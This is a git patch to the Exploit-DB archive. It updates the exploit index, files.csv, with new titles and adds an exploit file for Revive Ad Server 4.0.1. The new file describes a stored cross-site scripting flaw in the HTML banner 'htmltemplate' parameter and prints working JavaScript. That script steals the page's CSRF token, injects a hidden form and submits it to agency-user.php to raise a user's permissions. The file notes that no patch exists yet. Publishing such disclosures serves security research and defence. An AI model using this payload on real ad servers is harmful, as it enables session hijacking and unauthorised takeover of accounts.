From 0278b1993d00996794f65e945b67e34f653d18a4 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 27 Apr 2017 05:01:18 +0000
Subject: [PATCH] DB: 2017-04-27

1 new exploits

Oracle VM VirtualBox 3D Acceleration - Multiple Vulnerabilities
Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities

Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery
---
 files.csv                       |  3 +-
 platforms/php/webapps/41939.txt | 63 +++++++++++++++++++++++++++++++++
 2 files changed, 65 insertions(+), 1 deletion(-)
 create mode 100755 platforms/php/webapps/41939.txt

diff --git a/files.csv b/files.csv
index 87c153afb..9d89d5072 100644
--- a/files.csv
+++ b/files.csv
@@ -4052,7 +4052,7 @@ id,file,description,date,author,platform,type,port
 32193,platforms/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",multiple,dos,0
 32194,platforms/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,multiple,dos,0
 32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,multiple,dos,0
-32208,platforms/multiple/dos/32208.txt,"Oracle VM VirtualBox 3D Acceleration - Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0
+32208,platforms/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0
 32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 - WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",multiple,dos,0
 32229,platforms/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,windows,dos,0
 32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",linux,dos,0
@@ -37788,3 +37788,4 @@ id,file,description,date,author,platform,type,port
 41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0
 41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
 41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
+41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0
diff --git a/platforms/php/webapps/41939.txt b/platforms/php/webapps/41939.txt
new file mode 100755
index 000000000..6f62b39cc
--- /dev/null
+++ b/platforms/php/webapps/41939.txt
@@ -0,0 +1,63 @@
+---------------------------------------------------------------
+# Exploit Title: XSRF Stored Revive Ad Server 4.0.1
+# Date: 24/04/2017
+# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
+# Vendor Website : https://www.revive-adserver.com/
+# Software download : https://www.revive-adserver.com/download/
+# Version: 4.0.1
+# Tested on: Windows 7 x64 SP1 / Kali Linux
+
+
+Description :
+
+A vulnerability has been discovered in Revive Ad Server, which can be
+exploited by malicious people to conduct cross-site scripting attacks.
+When you create a banner using Generic HTML Banner, input
+
+passed via the 'htmltemplate' parameter to '/banner-edit.php' is not
+
+properly sanitised before being returned to the user (This is probably
+expected as it's an html banner). But, this can be exploited
+to execute arbitrary HTML and script code in a user's browser session in
+context of an affected site.
+
+
+This XSS vector allow to execute scripts to gather the CSRF token
+
+and submit a form to update user rights
+
+
+Here's the script :
+
+---------------------- Javascript-------------------------------
+
+var tok = document.getElementsByName('token')[0].value;
+
+var txt = '<form method="POST" id="hacked" action="agency-user.php">'
+txt += '<input type="hidden" name="submit[]" value="1"/>'
+txt += '<input type="hidden" name="token" value="' + tok + '"/>'
+txt += '<input type="hidden" name="userid" value="2"/>'
+txt += '<input type="hidden" name="email_address" value="test2@test.com"/>'
+txt += '<input type="hidden" name="agencyid" value="1"/>'
+txt += '<input type="hidden" name="permissions[]" value="10"/>'
+txt += '</form>'
+
+var d1 = document.getElementById('firstLevelContent');
+
+d1.insertAdjacentHTML('afterend', txt);
+
+document.getElementById("hacked").submit();
+
+
+---------------------- Javascript End-------------------------------
+
+(little trick to submit a form that has a "submit" parameter, just use a
+list "submit[]")
+
+This will update user rights and allow to manage accounts
+
+POC video : https://www.youtube.com/watch?v=wFuN-ADlJpM
+
+Patch : No patch yet
+
+---------------------------------------------------------------